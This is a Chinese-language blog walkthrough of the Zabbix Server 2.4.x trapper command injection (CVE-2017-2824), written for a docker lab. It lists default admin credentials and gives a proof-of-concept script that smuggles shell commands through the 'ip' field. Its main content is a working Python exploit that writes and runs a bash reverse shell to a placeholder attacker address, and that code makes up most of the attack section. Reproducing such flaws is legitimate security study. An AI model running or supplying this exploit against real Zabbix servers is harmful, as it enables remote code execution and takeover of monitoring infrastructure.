Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
文章目录
- 声明
- 一、漏洞简介
- 二、影响范围
- 三、环境搭建
- 四、本地实战
- POC测试
- 反弹Shell
声明
本篇文章仅用于技术学习与漏洞复现,切勿用于非授权下的渗透测试行为,切记!
一、漏洞简介
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。
二、影响范围
Zabbix Server 2.4.X 版本
三、环境搭建
Vulfocus:docker pull vulfocus/zabbix-cve_2017_2824:latest
查看本地镜像并运行漏洞环境
docker imagesdocker run -d -P vulfocus/zabbix-cve_2017_2824-d:将镜像挂起后台运行
-P:将镜像需要开启的端口随机映射到这台服务器的公网IP端口上
访问ip:port成功搭建,使用默认管理员账号密码进入后台
用户名:admin密码:Zabbix
接着 在Configuration
的选项卡里进入Actions
下把Event source选中Auto registration
,点击Create action
,以管理员的身份去开启自动注册功能
操作完成之后就开启了自动注册功能。
四、本地实战
POC测试
利用链接:https://github.com/listenquiet/cve-2017-2824-reverse-shell
import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)
使用 ls /tmp
命令查看是否执行成功
反弹Shell
Exp如下:
import sys
import socket
import json
from time import sleepdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return data# target = "X.X.X.X"
target = sys.argv[1]
num = 1exps = [';echo -n "/bin/bash" > /tmp/1.sh', ';echo -n " -i >& " >> /tmp/1.sh', ';echo -n "/dev/tcp/" >> /tmp/1.sh',';echo -n "X.X." >> /tmp/1.sh', ';echo -n "X.X/" >> /tmp/1.sh', ';echo -n "1234 0>&1" >> /tmp/1.sh',';/bin/bash /tmp/1.sh']
for exp in exps:host = "vulhub" + str(num)print(host)print(send(target, {"request": "active checks", "host": host, "ip": exp}))sleep(1)num += 1for i in range(10000, 10500):data = send(target, {"request": "command", "scriptid": 1, "hostid": str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)
执行:python3 exp.py X.X.X.X
可以看到已经反弹Shell
攻击完成!!!
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)相关推荐
- Zabbix Server trapper命令注入漏洞(CVE-2020-11800)
漏洞简介 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统.该系统支持网络监控.服务器监控.云监控和应用监控等. Zabbix SIA zabbix3-prox ...
- Zabbix Server trapper命令注入漏洞(CVE-2017-2824)
漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统.该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位.解决存在的各种问题. Zabb ...
- (CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞
(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞 20210508 一.漏洞简介 Zabbix 是由Alexei Vladishev 开发的一种网络监视.管理系 ...
- Ubiquiti几十款无线产品爆出命令注入漏洞 是因为没有升级老版本的PHP 据说厂商还未给出补丁...
Ubiquiti Networks公司提供的几十款产品中存在紧急漏洞,该漏洞可用于劫持设备.这个漏洞已于11月上报给了该厂商,但目前厂商尚未发布补丁修复大多数受影响的设备. 命令注入漏洞来自于没有升级 ...
- java 漏洞挖掘_Apache Tika命令注入漏洞挖掘
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...
- 修改jar 注入_Apache Tika命令注入漏洞挖掘
介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...
- cracer培训教程第一期 文件上传漏洞与命令注入漏洞
偏向php 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,并让服务器段执行,代码注入的典型代表就是文件包含file inclusion.文件包含可能出现在jsp.php.as ...
- 最新系统漏洞--QSAN SANOS命令注入漏洞
最新系统漏洞2021年10月21日 受影响系统: QSAN SANOS <= 2.0.0 (build 202012222000) 描述: CVE(CAN) ID: CVE-2021-32533 ...
- 文件包含和命令注入漏洞
文件包含和命令注入漏洞 文件包含漏洞 介绍 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,让服务器端执行,代码注入的典型代表就是文件包含file inclusion.文件包含 ...
最新文章
- 原创,自己做的一个简单实用的提示小插件,兼容性很好,基本上都兼容!
- SmartNIC/DPU — 主流厂商
- 示波器输入阻抗匹配问题
- Java容器类和包装类
- Jquery插件入门之Validate插件的简单使用
- PriorityBlockingQueue源码
- linux自动挂载fcoe存储,在sdb上挂载USB 设备
- python 编辑excel需要什么包_Python 中操作EXCEL表格的包
- 博客园代码黑色主题高亮设置
- 挨踢部落故事汇(6):女攻城狮职位晋升记
- 根据函数名称调用函数
- 【模式识别-北理工】02模式识别算法体系
- ad18 bell封装,AD元件库中常用元件
- node ajax实现登录注册,nodejs实现简易登录注册
- 下载docker镜像包
- 如何加声调口诀_拼音声调口诀
- 搭建代理服务器的完整步骤
- 50个MySql语句
- 怎么起用计算机无线开关,笔记本无线网络开关,详细教您如何打开笔记本电脑无线网卡开关...
- linux安装硬盘超过2t,linux 硬盘超过2T问题